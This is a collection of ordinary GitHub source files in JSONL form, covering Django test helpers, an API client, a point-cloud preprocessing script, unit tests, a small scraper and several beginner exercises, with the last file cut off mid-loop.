+{"seq_id":"72069387784","text":"from unittest.mock import MagicMock\n\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.urls import resolve\n\nfrom sockpuppet.consumer import SockpuppetConsumer\nfrom sockpuppet.reflex import Reflex\nfrom sockpuppet.element import Element\n\n\ndef reflex_factory(url, client, user=None, attributes={}, selectors=None, params={}):\n if not user:\n user = AnonymousUser()\n scope = {\"session\": client.session, \"user\": user}\n mock_consumer = MagicMock(scope=scope, spec=SockpuppetConsumer)\n element = Element(attributes)\n resolve(url) # work as an assert that url actually exists\n reflex = Reflex(\n consumer=mock_consumer,\n url=url,\n element=element,\n selectors=selectors,\n params=params,\n )\n return reflex\n","repo_name":"jonathan-s/django-sockpuppet","sub_path":"sockpuppet/test_utils/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":437,"dataset":"github-code","pt":"81"} +{"seq_id":"18163594947","text":"\r\n#Old Approach\r\ndef smallest_multiple(n):\r\n count=0\r\n for i in range(11,21):\r\n\r\n if n % i == 0:\r\n count+=1\r\n return count\r\n\r\n\r\nflag=True\r\nnumber=11\r\nwhile flag :\r\n\r\n divisors= smallest_multiple(number)\r\n print(\"The number of divisors for \" + str(number) + \" are: \" + str(divisors))\r\n if divisors>9:\r\n flag=False\r\n else:\r\n number+=11\r\n","repo_name":"Kangiryanka/ProjectEuler_problems","sub_path":"Project_Euler/smultiplev1.py","file_name":"smultiplev1.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17980088610","text":"def main():\r\n print(\"\\n\\n\\n\\n######### Video Duration Calculator #########\")\r\n print(\" Press 'q' to get the final total.\\n\")\r\n total_seconds = 0\r\n\r\n def calculate_time(total_seconds):\r\n hours, remainder = divmod(total_seconds, 3600)\r\n minutes, seconds = divmod(remainder, 60)\r\n return f\"{hours:02d}:{minutes:02d}:{seconds:02d}\"\r\n\r\n while True:\r\n val_entered = input(\"Enter video duration 
(mm:ss): \")\r\n\r\n if val_entered == 'q':\r\n print(\"Generating total time...\")\r\n final_total = calculate_time(total_seconds)\r\n print(f\"Final video duration total: {final_total}\")\r\n break\r\n\r\n try:\r\n minutes, seconds = map(int, val_entered.split(\":\"))\r\n converted_seconds = minutes * 60 + seconds\r\n total_seconds += converted_seconds\r\n current_total = calculate_time(total_seconds)\r\n print(f\"Current total: {current_total}\")\r\n except ValueError:\r\n print(\"Invalid input. Please use the mm:ss format.\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"FahimIslam2410/Video-Duration-Calculator","sub_path":"VideoDurationCalculator.py","file_name":"VideoDurationCalculator.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8313285710","text":"\n\n# =========================================== md5 ========================================\nimport os\nimport hashlib\n\ndef get_md5(inputs, format_type=\"string\"):\n \"\"\"\n format_type: 'string' or 'file'\n \"\"\"\n\n data = \"null\"\n if format_type in [\"file\"]:\n if not os.path.isfile(inputs):\n return None\n\n with open(inputs, \"rb\") as fr:\n data = fr.read()\n elif format_type in [\"string\"]:\n data = inputs\n\n md5_value = hashlib.md5(data.encode(\"utf-8\")).hexdigest()\n\n return md5_value\n\n\ndef get_encoded_path(article_id, dirlen=2, dirnum=4, return_type='str'):\n md5_value = get_md5(article_id)\n folders = []\n s_i = 0\n for i in range(dirnum):\n if s_i + dirlen >= len(md5_value) or i==dirnum-1:\n folders.append(md5_value[s_i:])\n break\n else:\n folders.append(md5_value[s_i:s_i+dirlen])\n s_i += dirlen\n\n folder_path = os.path.join(*folders)\n if return_type=='str':\n return folder_path\n elif return_type=='list':\n return folders\n else:\n raise ValueError\n\n\n'''timeStamp to timeStr: 1479264792 to 2016-11-16 10:53:12'''\ndef timeStamp_To_timeStr(timeStamp):\n timeStruct = time.localtime(timeStamp)\n return time.strftime('%Y-%m-%d %H:%M:%S',timeStruct)\n\n\nif __name__ == '__main__':\n ID = 'S1500000SO01DG1SVEFT0MH'\n ID = 'S0900000000000004770110'\n ID = 'S33000003xekxqm28frufpm'\n folder_list = get_encoded_path(ID, return_type='list') \n print('#### ID, folder_list', ID, folder_list) \n\n","repo_name":"songxia928/utils_cv","sub_path":"script/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9709228929","text":"import argparse\nimport re\nfrom pathlib import Path\nfrom typing import Callable, Dict, List, Optional, Sequence\n\nimport libcst as cst\n\nKEY_PATTERN = re.compile(r'^(\\\"|\\')(?P.*)(\\\"|\\')$')\nEXIT_CODE_NO_CHANGES = 0\nEXIT_CODE_WITH_CHANGES = 1\n\n\nclass Sorting:\n ALPHABETICALY = 'alpha'\n ALL = (ALPHABETICALY,)\n\n\ndef get_formatting(elements: List[cst.CSTNode]):\n return [\n {\n 'comma': element.comma,\n 'whitespace_after_colon': element.whitespace_after_colon,\n 'whitespace_before_colon': element.whitespace_before_colon,\n }\n for element in elements\n ]\n\n\ndef apply_formatting(\n elements: List[cst.CSTNode],\n formatting: List[Dict[str, cst.CSTNode]],\n):\n return [\n element.with_changes(**fmt)\n for fmt, element in zip(formatting, elements)\n ]\n\n\ndef extract_key_value(node: cst.BaseString):\n return re.match(KEY_PATTERN, node.value).groupdict()['key']\n\n\ndef get_sorting_func(sorting_type: str):\n return {\n 'alpha': 
lambda x: extract_key_value(x.key),\n }[sorting_type]\n\n\ndef sort_by(elements: List[cst.DictElement], key: Callable):\n # special symbols -> cipher -> uppercase -> lowercase\n return tuple(sorted(elements, key=key))\n\n\ndef ensure_keys_sorted(node: cst.Dict, key: Callable):\n return sort_by(node.elements, key) == node.elements\n\n\ndef ensure_key_not_str(element: cst.Element):\n return not isinstance(element.key, cst.BaseString)\n\n\ndef ensure_starred_element(element: cst.Element):\n return isinstance(element, cst.StarredDictElement)\n\n\ndef ensure_key_formatted_string(element: cst.Element):\n return isinstance(element.key, cst.FormattedString)\n\n\ndef should_transform_dict(\n node: cst.Dict,\n funcs: tuple[Callable] = (\n ensure_starred_element,\n ensure_key_formatted_string,\n ensure_key_not_str,\n ),\n) -> bool:\n for element in node.elements:\n for func in funcs:\n if func(element):\n return False\n return True\n\n\nclass DictKeysSorter(cst.CSTTransformer):\n def __init__(self, sorting_type):\n self.transformed = False\n self.sorting_func = get_sorting_func(sorting_type)\n\n def leave_Dict(self, original_node, updated_node):\n if not should_transform_dict(updated_node):\n return updated_node\n\n if ensure_keys_sorted(updated_node, self.sorting_func):\n return updated_node\n\n self.transformed = True\n\n sorted_elements = apply_formatting(\n elements=sort_by(updated_node.elements, key=self.sorting_func),\n formatting=get_formatting(updated_node.elements),\n )\n\n return updated_node.with_changes(elements=tuple(sorted_elements))\n\n\ndef ensure_python_file(file_path: Path):\n return file_path.suffix == '.py'\n\n\ndef fix_file(file_path, sorting: str) -> int:\n is_fixed = False\n\n with file_path.open('r') as file_obj:\n syntax_tree = cst.parse_module(file_obj.read())\n\n sorter = DictKeysSorter(sorting)\n transformed_tree = syntax_tree.visit(sorter)\n\n if sorter.transformed:\n with file_path.open('w') as file_obj:\n file_obj.write(transformed_tree.code)\n is_fixed = True\n\n return is_fixed\n\n\ndef main(argv: Optional[Sequence[str]] = None) -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'filenames',\n nargs='*',\n metavar='path',\n type=str,\n help='Filenames to check.',\n )\n parser.add_argument(\n '--sorting',\n type=str,\n choices=[Sorting.ALL],\n default=Sorting.ALPHABETICALY,\n help='Sorting style applied to dictionary keys.',\n action='store',\n )\n args = parser.parse_args(argv)\n\n return_code = EXIT_CODE_NO_CHANGES\n\n if not args.filenames:\n return return_code\n\n for filename in args.filenames:\n file_path = Path(filename)\n if not ensure_python_file(file_path):\n continue\n\n is_fixed = fix_file(file_path, args.sorting)\n if is_fixed:\n print(f'Fixed {filename}')\n return_code = EXIT_CODE_WITH_CHANGES\n\n return return_code\n\n\nif __name__ == '__main__':\n exit(main())\n","repo_name":"dbohomiakov/dict-keys-sorter","sub_path":"dict_keys_sorter.py","file_name":"dict_keys_sorter.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"35888502484","text":"import time\nfrom typing import Optional, Dict, Any, Callable\nimport requests\n\nfrom cryptocompsdk.config import MAX_LIMIT_PER_API_CALL\nfrom cryptocompsdk.logger import logger\nfrom cryptocompsdk.response import ResponseException, ResponseAPIBase\n\n\nclass Request:\n\n def __init__(self, url: str, payload: Optional[Dict[str, Any]], response: requests.Response):\n self.url = url\n self.payload = 
payload\n self.response = response\n\n @property\n def json(self) -> dict:\n return self.response.json()\n\n\nclass APIBase:\n _exception_class = ResponseException\n\n def __init__(self, api_key: str, throttle: Optional[float] = None):\n self.api_key = api_key\n self.throttle = throttle\n\n def request(self, url: str, payload: Optional[Dict[str, Any]] = None) -> Request:\n api_key_dict = {'api_key': self.api_key}\n payload = self.filter_payload(payload)\n if payload is not None:\n payload.update(api_key_dict)\n else:\n payload = api_key_dict\n\n result = requests.get(url, params=payload)\n logger.debug(f'Requested {result.request.url}')\n return Request(url, payload, result)\n\n def filter_payload(self, payload: Optional[Dict[str, Any]]):\n if payload is None:\n return payload\n\n # Remove None values as they were just defaults\n without_none = {key: value for key, value in payload.items() if value is not None}\n\n # Convert booleans into boolean strings that API is expecting\n with_str_bools = {key: _bool_to_str_if_bool(value) for key, value in without_none.items()}\n\n return with_str_bools\n\n def _get_one_or_paginated(self, url: str, payload: Optional[Dict[str, Any]] = None,\n max_api_calls: Optional[int] = None,\n limit_in_payload: bool = True, date_name: str = 'toTs'):\n \"\"\"\n This method should be called in the subclass .get method\n\n :param url: url to request\n :param payload: data to send with request\n :param max_api_calls: limit on number of API calls\n :param limit_in_payload: whether to include the limit parameter in request payload\n :param date_name: name of date in payload\n :return:\n \"\"\"\n if payload is not None and payload.get('limit') == 0:\n return self._get_with_pagination(\n url,\n payload=payload,\n max_api_calls=max_api_calls,\n limit_in_payload=limit_in_payload,\n date_name=date_name,\n )\n return self._get(url, payload=payload)\n\n def _get(self, url: str, payload: Optional[Dict[str, Any]] = None):\n if self.throttle is not None:\n time.sleep(self.throttle)\n data = self.request(url, payload)\n obj = self._class_factory(data.json)\n # isinstance dict added for development of api where class has not been set yet\n if isinstance(obj, dict):\n return obj\n if obj.has_error:\n if payload is not None:\n payload_str = f'payload {payload}'\n else:\n payload_str = 'no payload'\n raise self._exception_class(f'Requested {url} with {payload_str}, '\n f'got {data.json} as response')\n obj._request = data\n return obj\n\n def _get_with_pagination(self, url: str, payload: Dict[str, Any],\n max_api_calls: Optional[int] = None,\n limit_in_payload: bool = True, date_name: str = 'toTs'):\n if max_api_calls is None:\n # TODO [#4]: less hackish\n max_api_calls = 10000000\n\n if limit_in_payload:\n payload['limit'] = MAX_LIMIT_PER_API_CALL\n\n end_time = payload[date_name]\n i = -1\n while i + 1 < max_api_calls:\n i += 1\n payload[date_name] = end_time\n try:\n data = self._get(url, payload)\n except self._exception_class as e:\n # In blockchain history API, upon going too far back, it sends this message back\n if 'does not have data available before requested timestamp' in str(e):\n break\n else:\n raise e\n if i == 0:\n all_data = data\n if data.is_empty:\n # In price history API, upon going too far back, it sends 0 for all data\n break\n if i != 0:\n # chop off matching record. 
The end_time observation will be included in both responses\n data.delete_record_matching_time(end_time)\n all_data = data + all_data\n end_time = data.time_from\n\n all_data.trim_empty_records_at_beginning()\n\n return all_data\n\n def _class_factory(self, data: dict):\n raise NotImplementedError('must implement in subclass')\n\n\ndef _bool_to_str(boolean: bool) -> str:\n if not isinstance(boolean, bool):\n raise ValueError(f'non-boolean {boolean} passed to _bool_to_str')\n\n if boolean:\n return 'true'\n\n return 'false'\n\n\ndef _bool_to_str_if_bool(obj: Any) -> Any:\n if not isinstance(obj, bool):\n return obj\n return _bool_to_str(obj)\n","repo_name":"nickderobertis/cryptocompare-py","sub_path":"cryptocompsdk/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":5325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21817026464","text":"# Test the Astrohaven dome interface using a simulated dome controller.\nfrom contextlib import suppress\n\nimport pytest\nimport serial\n\nfrom panoptes.pocs import hardware\nfrom panoptes.pocs.dome import astrohaven\nfrom panoptes.pocs.dome import create_dome_simulator\n\nfrom panoptes.utils.config.client import set_config\n\n\n@pytest.fixture(scope='function')\ndef dome():\n # Install our test handlers for the duration.\n serial.protocol_handler_packages.append('panoptes.pocs.dome')\n\n # Modify the config so that the dome uses the right controller and port.\n set_config('simulator', hardware.get_all_names(without=['dome']))\n set_config('dome', {\n 'brand': 'Astrohaven',\n 'driver': 'astrohaven',\n 'port': 'loop://',\n })\n the_dome = create_dome_simulator()\n\n yield the_dome\n with suppress(Exception):\n the_dome.disconnect()\n\n # Remove our test handlers.\n serial.protocol_handler_packages.remove('panoptes.pocs.dome')\n\n\ndef test_create(dome):\n assert isinstance(dome, astrohaven.AstrohavenDome)\n assert isinstance(dome, astrohaven.Dome)\n # We use rs232.SerialData, which automatically connects.\n assert dome.is_connected\n\n\ndef test_connect_and_disconnect(dome):\n # We use rs232.SerialData, which automatically connects.\n assert dome.is_connected is True\n dome.disconnect()\n assert dome.is_connected is False\n assert dome.connect() is True\n assert dome.is_connected is True\n dome.disconnect()\n assert dome.is_connected is False\n\n\ndef test_disconnect(dome):\n assert dome.connect() is True\n dome.disconnect()\n assert dome.is_connected is False\n # Can repeat.\n dome.disconnect()\n assert dome.is_connected is False\n\n\n@pytest.mark.skip(reason='No astrohaven_simulator protocol anymore')\ndef test_open_and_close_slit(dome):\n dome.connect()\n\n assert dome.open() is True\n assert dome.status['open'] == 'open_both'\n assert dome.is_open is True\n\n # Try to open shutter\n assert dome.open() is True\n\n assert dome.close() is True\n assert dome.status['open'] == 'closed_both'\n assert dome.is_closed is True\n\n # Try to close again\n assert dome.close() is True\n\n dome.disconnect()\n","repo_name":"panoptes/POCS","sub_path":"tests/test_dome_astrohaven.py","file_name":"test_dome_astrohaven.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"78"} +{"seq_id":"718858881","text":"import pandas as pd\nfrom xml.dom import minidom\nfrom tkinter.filedialog import askopenfilenames\nfrom datetime import datetime\n\nEmD = []\nNumNF = []\nNumCTE = []\nClientName = []\nDeliveryCity = 
[]\nCteValue = []\n\ncte_path = askopenfilenames(filetypes=[(\"Text files\", \".xml\")])\n\nfor actual_xml in cte_path:\n tree = minidom.parse(actual_xml)\n\n emission_date = tree.getElementsByTagName('dhEmi')\n num_nf = tree.getElementsByTagName('chave')\n num_cte = tree.getElementsByTagName('nCT')\n client_name = tree.getElementsByTagName('xNome')\n delivery_city = tree.getElementsByTagName('xMun')\n cte_value = tree.getElementsByTagName('vRec')\n\n EmD.append(emission_date[0].firstChild.data)\n NumNF.append(num_nf[0].firstChild.data)\n NumCTE.append(num_cte[0].firstChild.data)\n ClientName.append(client_name[2].firstChild.data)\n DeliveryCity.append(delivery_city[2].firstChild.data)\n CteValue.append(cte_value[0].firstChild.data)\n\nfor pos, each_date in enumerate(EmD):\n emission_date = datetime.fromisoformat(each_date)\n formatted_emission_date = f'{emission_date.day}/{emission_date.month:02d}/{emission_date.year}'\n EmD[pos] = formatted_emission_date\n\nfor pos, each_numNf in enumerate(NumNF):\n each_numNf = each_numNf[28:34]\n NumNF[pos] = each_numNf\n\ncte_df = pd.DataFrame(list(zip(EmD, NumNF, NumCTE, ClientName, DeliveryCity, CteValue)), columns=['Data Emissao', 'Numero NF', 'Numero CTE', 'Nome Cliente', 'Cidade Entrega', 'Valor CTE'])\n\nCteValueSum = list(map(float, CteValue))\ntotal_cte = sum(CteValueSum)\ntotal_cte = str(total_cte)\ncte_df.loc[len(cte_df.index)] = ['-', '-', '-', '-', '-', total_cte + '0']\ncte_df.index += 1\n\ncte_df = cte_df.rename(index={len(cte_df.index):'TOTAL'})\n\ncte_df.to_excel(\"controle_cte.xlsx\")","repo_name":"DavidSBarbosa/controle_cte","sub_path":"controle_cte.py","file_name":"controle_cte.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"23293898337","text":"from twisted.internet.defer import inlineCallbacks, returnValue\nfrom twisted.trial.unittest import TestCase\nfrom twisted.internet.defer import setDebugging\nfrom twisted.internet import reactor\nfrom twisted.internet.task import Clock\n\nfrom vumi.transports import Transport\nfrom vumi.transports.tests.helpers import TransportHelper\nfrom vumi.tests.helpers import PersistenceHelper, VumiTestCase\n\nfrom middlewares.custom_middleware_stack import (\n CustomMiddlewareStack, StopPropagation, useCustomMiddleware)\nfrom middlewares.window_manager_middleware import WindowManagerMiddleware\nfrom components.window_manager import VusionWindowManager\n\n\n@useCustomMiddleware\nclass DummyTransport(Transport):\n \n outbound_msgs = []\n \n def handle_outbound_message(self, message):\n self.outbound_msgs.append(message)\n\n\nclass WindowManagerTestCase(VumiTestCase):\n\n @inlineCallbacks\n def setUp(self):\n self.tx_helper = self.add_helper(TransportHelper(DummyTransport))\n self.transport = yield self.tx_helper.get_transport({})\n \n self.persistence_helper = self.add_helper(PersistenceHelper())\n redis = yield self.persistence_helper.get_redis_manager()\n \n self.transport_name = self.transport.transport_name\n config = {'window_size': 2,\n 'flight_lifetime': 1,\n 'monitor_loop': 0.5}\n self.mw = WindowManagerMiddleware('mw1', config, self.transport)\n\n yield self.mw.setup_middleware(redis)\n \n self.clock = Clock()\n self.patch(VusionWindowManager, 'get_clock', lambda _: self.clock)\n def mock_clock_time(self):\n return self._clocktime\n self.patch(VusionWindowManager, 'get_clocktime', mock_clock_time)\n self.mw.wm._clocktime = 0\n\n @inlineCallbacks\n def tearDown(self):\n yield 
self.mw.teardown_middleware()\n yield super(WindowManagerTestCase, self).tearDown()\n\n @inlineCallbacks\n def test_handle_outbound(self):\n msg_1 = self.tx_helper.make_outbound('hello world 1', message_id='1')\n yield self.assertFailure(\n self.mw.handle_outbound(msg_1, self.mw.queue_name),\n StopPropagation)\n stored_msg_1 = yield self.mw.wm.get_data(self.mw.queue_name, '1')\n self.assertEqual(msg_1.to_json(), stored_msg_1)\n\n msg_2 = self.tx_helper.make_outbound('hello world 2', message_id='2')\n yield self.assertFailure(\n self.mw.handle_outbound(msg_2, self.mw.queue_name),\n StopPropagation)\n\n msg_3 = self.tx_helper.make_outbound('hello world 3', message_id='3')\n yield self.assertFailure(\n self.mw.handle_outbound(msg_3, self.mw.queue_name),\n StopPropagation)\n\n count_waiting = yield self.mw.wm.count_waiting(self.mw.queue_name)\n self.assertEqual(3, count_waiting) \n\n yield self.mw.wm._monitor_windows(self.mw.send_outbound)\n count_waiting = yield self.mw.wm.count_waiting(self.mw.queue_name)\n self.assertEqual(1, count_waiting)\n count_in_flight = yield self.mw.wm.count_in_flight(self.mw.queue_name)\n self.assertEqual(2, count_in_flight)\n self.assertEqual(2, len(self.mw.worker.outbound_msgs))\n\n #acknoledge one\n ack = self.tx_helper.make_ack(sent_message_id='1')\n yield self.mw.handle_event(ack, self.mw.queue_name)\n count_in_flight = yield self.mw.wm.count_in_flight(self.mw.queue_name)\n self.assertEqual(1, count_in_flight)\n #make sure it has been deleted\n stored_msg_1 = yield self.mw.wm.get_data(self.mw.queue_name, '1')\n self.assertTrue(stored_msg_1 is None)\n\n yield self.mw.wm._monitor_windows(self.mw.send_outbound)\n count_in_flight = yield self.mw.wm.count_in_flight(self.mw.queue_name)\n self.assertEqual(2, count_in_flight)\n\n #now they expire\n self.mw.wm._clocktime = 20\n yield self.mw.wm.clear_expired_flight_keys()\n #make sure it has been deleted\n stored_msg_2 = yield self.mw.wm.get_data(self.mw.queue_name, '2') \n # the expired message should be deleted\n self.assertTrue(stored_msg_2 is None)\n \n #the expired flight keys should be cleanedup\n expired_flight_keys = yield self.mw.wm.get_expired_flight_keys(self.mw.queue_name)\n self.assertEqual([], expired_flight_keys)\n \n count_in_flight = yield self.mw.wm.count_in_flight(self.mw.queue_name)\n self.assertEqual(0, count_in_flight) \n \n","repo_name":"texttochange/vusion-backend","sub_path":"middlewares/tests/test_window_manager_middleware.py","file_name":"test_window_manager_middleware.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"36033340280","text":"import argparse\nimport io\nimport os\nimport shutil\nfrom zipfile import ZipFile\n\nos.environ[\"OMP_NUM_THREADS\"] = \"4\"\nos.environ[\"OPENBLAS_NUM_THREADS\"] = \"4\"\nos.environ[\"MKL_NUM_THREADS\"] = \"6\"\nos.environ[\"VECLIB_MAXIMUM_THREADS\"] = \"4\"\nos.environ[\"NUMEXPR_NUM_THREADS\"] = \"6\"\n\nimport numpy as np\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--data_root\", type=str, default=\"./data/kitti/raw/\")\nparser.add_argument(\"--output_root\", type=str, default=\"./data/kitti/processed/\")\nparser.add_argument(\"--make_tar\", action=\"store_true\")\nargs = parser.parse_args()\n\nos.makedirs(args.output_root, exist_ok=True)\n\n\ndef extract_init_seed(pts_sort, n_lpr, th_seed):\n lpr = np.mean(pts_sort[:n_lpr, 2])\n seed = pts_sort[pts_sort[:, 2] < lpr + th_seed, :]\n return seed\n\n\ndef extract_ground(pts):\n th_seeds_ 
= 1.2\n num_lpr_ = 20\n n_iter = 10\n th_dist_ = 0.3\n pts_sort = pts[pts[:, 2].argsort(), :]\n pts_g = extract_init_seed(pts_sort, num_lpr_, th_seeds_)\n normal_ = np.zeros(3)\n for i in range(n_iter):\n mean = np.mean(pts_g, axis=0)[:3]\n xx = np.mean((pts_g[:, 0] - mean[0]) * (pts_g[:, 0] - mean[0]))\n xy = np.mean((pts_g[:, 0] - mean[0]) * (pts_g[:, 1] - mean[1]))\n xz = np.mean((pts_g[:, 0] - mean[0]) * (pts_g[:, 2] - mean[2]))\n yy = np.mean((pts_g[:, 1] - mean[1]) * (pts_g[:, 1] - mean[1]))\n yz = np.mean((pts_g[:, 1] - mean[1]) * (pts_g[:, 2] - mean[2]))\n zz = np.mean((pts_g[:, 2] - mean[2]) * (pts_g[:, 2] - mean[2]))\n cov = np.array([[xx, xy, xz], [xy, yy, yz], [xz, yz, zz]])\n U, S, V = np.linalg.svd(cov)\n normal_ = U[:, 2]\n d_ = -normal_.dot(mean)\n th_dist_d_ = th_dist_ - d_\n result = pts[:, :3].dot(normal_)\n pts_n_g = pts[result > th_dist_d_]\n pts_g = pts[result < th_dist_d_]\n return pts_g, pts_n_g\n\n\ndef process_scene(split=\"training\", scene_id=\"0019\"):\n velodyne_path = os.path.join(args.data_root, \"data_tracking_velodyne.zip\")\n label_path = os.path.join(args.data_root, \"data_tracking_label_2.zip\")\n calib_path = os.path.join(args.data_root, \"data_tracking_calib.zip\")\n detection_path = os.path.join(args.data_root, \"data_tracking_detection.zip\")\n assert os.path.exists(velodyne_path), \"Please download the KITTI dataset first\"\n assert os.path.exists(label_path), \"Please download the KITTI dataset first\"\n assert os.path.exists(calib_path), \"Please download the KITTI dataset first\"\n assert os.path.exists(detection_path), \"Please download the KITTI dataset first\"\n\n clean_pcs_dir = os.path.join(args.output_root, split, \"clean_pcs\", scene_id)\n os.makedirs(clean_pcs_dir, exist_ok=True)\n\n with ZipFile(velodyne_path) as velodyne_zf:\n scene_files = [\n file for file in velodyne_zf.namelist() if f\"{split}/velodyne/{scene_id}\" in file and file.endswith(\".bin\")\n ]\n scene_files = sorted(scene_files)\n\n for frame_idx, frame_file in enumerate(scene_files):\n assert frame_file == f\"{split}/velodyne/{scene_id}/{frame_idx:06d}.bin\"\n with io.BufferedReader(velodyne_zf.open(frame_file, mode=\"r\")) as f:\n pc = np.frombuffer(f.read(), dtype=np.float32).reshape(-1, 4)\n ground_pc, clean_pc = extract_ground(pc[:, :3])\n np.save(os.path.join(clean_pcs_dir, \"{}.npy\".format(frame_idx)), clean_pc)\n\n with ZipFile(detection_path) as detection_zf:\n scene_files = [\n file\n for file in detection_zf.namelist()\n if f\"{split}/detection/{scene_id}\" in file and file.endswith(\".pkl\")\n ]\n scene_files = sorted(scene_files)\n\n for frame_idx, frame_file in enumerate(scene_files):\n assert frame_file == f\"{split}/detection/{scene_id}/{frame_idx:06d}.pkl\"\n detection_zf.extract(frame_file, path=args.output_root)\n\n with ZipFile(label_path) as label_zf:\n scene_file = f\"{split}/label_02/{scene_id}.txt\"\n label_zf.extract(scene_file, path=args.output_root)\n\n with ZipFile(calib_path) as calib_zf:\n scene_file = f\"{split}/calib/{scene_id}.txt\"\n calib_zf.extract(scene_file, path=args.output_root)\n\n\nif __name__ == \"__main__\":\n process_scene(\"training\", \"0019\")\n process_scene(\"training\", \"0020\")\n if args.make_tar:\n shutil.make_archive(\n args.output_root,\n \"tar\",\n os.path.join(args.output_root, \"..\"),\n os.path.split(os.path.normpath(args.output_root))[-1],\n 
)\n","repo_name":"jianglongye/implicit-tracking","sub_path":"tools/prepare_kitti.py","file_name":"prepare_kitti.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"78"} +{"seq_id":"23052723696","text":"def binary_search(array, element, left, right):\r\n if left > right: # если левая граница превысила правую,\r\n return False # значит элемент отсутствует\r\n\r\n middle = (right + left) // 2 # находим середину последовательности\r\n if array[middle-1] < element <= array[middle]: # если элемент в середине,\r\n return middle-1 # возвращаем этот индекс\r\n elif element < array[middle]: # если элемент меньше элемента в середине\r\n # рекурсивно ищем в левой половине\r\n return binary_search(array, element, left, middle - 1)\r\n else: # иначе в правой\r\n return binary_search(array, element, middle + 1, right)\r\n\r\narray = list(map(int,input(\"Введите несколько целых чисел через пробел \").split()))\r\n\r\n\r\n\r\nelement = int(input(\"Введите любое случайное число в диапазоне чисел введенных ранее \"))\r\n\r\narray = sorted(array)\r\nleft = int(array[0])\r\nright = int(array[-1])\r\n\r\nif element < left or element > right:\r\n print('Числа нет в диапазоне')\r\nelse:\r\n print('индекс числа последовательности, которое меньше введенного =', binary_search(array, element, 0, len(array) - 1))\r\n print('отсортированная введенная последовательность', array)","repo_name":"igorQA123/task22.9.1","sub_path":"22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4504022446","text":"from bs4 import BeautifulSoup as BS\r\nimport requests\r\n\r\n# Base URL of content pages\r\nbase_url = \"http://highscalability.com/blog/?currentPage={:d}\"\r\n\r\n# A variable for collecting links to individual articles\r\nlinks = []\r\n\r\n# Loop through the first 10 content pages\r\nfor i in range(1, 11):\r\n\r\n # Generate the actual URL to the content page\r\n url = base_url.format(i)\r\n print(url)\r\n\r\n # Send HTTP request\r\n res = requests.get(url, timeout=5)\r\n if res.status_code == 200:\r\n\r\n # Parse the page using BeautifulSoup\r\n soup = BS(res.text, 'lxml')\r\n\r\n # Extract links of individual articles\r\n anchors = soup.select(\"h2 a\")\r\n for a in anchors:\r\n links.append(a[\"href\"])\r\n","repo_name":"albertauyeung/iems5703","sub_path":"lectures/files/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7590415466","text":"import pytest\n\nfrom core.lexer import ListLexer\nfrom .parser import Parser, SpeculationException\n\n\nclass TestListParser:\n @staticmethod\n def _parse_success_test_cases() -> list[str]:\n return [\n '[]',\n '[a]',\n '[a, b, c]',\n '[a, b, c=d]',\n '[a, [b, c, d=e], [f=g]]',\n '[a, [], []]',\n '[a, b]=[c, d]',\n '[a, b]=[[c], [de=f]]',\n ]\n\n @staticmethod\n def _parse_fail_test_cases() -> list[str]:\n return [\n '[',\n ']',\n '[a, b, c,]',\n '[a, [, c]',\n '[a, b, c][',\n '[a, b=, c]',\n '[a, b]=[c, d',\n '[a, b]=[[c], de=f]]',\n ]\n\n @pytest.mark.parametrize('input_text', _parse_success_test_cases())\n def test_parse_success(self, input_text):\n lexer = ListLexer(input_text)\n parser = Parser(lexer)\n parser.parse()\n\n @pytest.mark.parametrize('input_text', _parse_fail_test_cases())\n def test_parse_fail(self, input_text):\n 
lexer = ListLexer(input_text)\n parser = Parser(lexer)\n with pytest.raises(SpeculationException):\n parser.parse()\n","repo_name":"fidemin/language-implementation-practice","sub_path":"enhanced_parser/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15421957660","text":"'''\n구현, 수학 문제\n\nwhile 문으로 반복되는 값이 나오기 전까지 반복하고, 나올때 break를 건다.\n그 후에 해당 res를 반복되기 전의 값들로 다시 초기화 한 후,\nres의 길이를 출력하면 된다.\n\ndeque를 안써도 충분히 풀 수도 있는데, 이것 저것 사용해 보고 싶은 마음에 사용했다.\n'''\n\nfrom collections import deque\n\na, p = map(int, input().split())\n\n# 테스트\n# a, p = 57, 2\n\nq = deque([a])\nres = [a]\n\nwhile 1:\n x = str(q.popleft())\n temp = 0\n\n for i in x:\n temp += int(i) ** p\n \n if temp in res:\n res = res[:res.index(temp)]\n break\n\n res.append(temp)\n 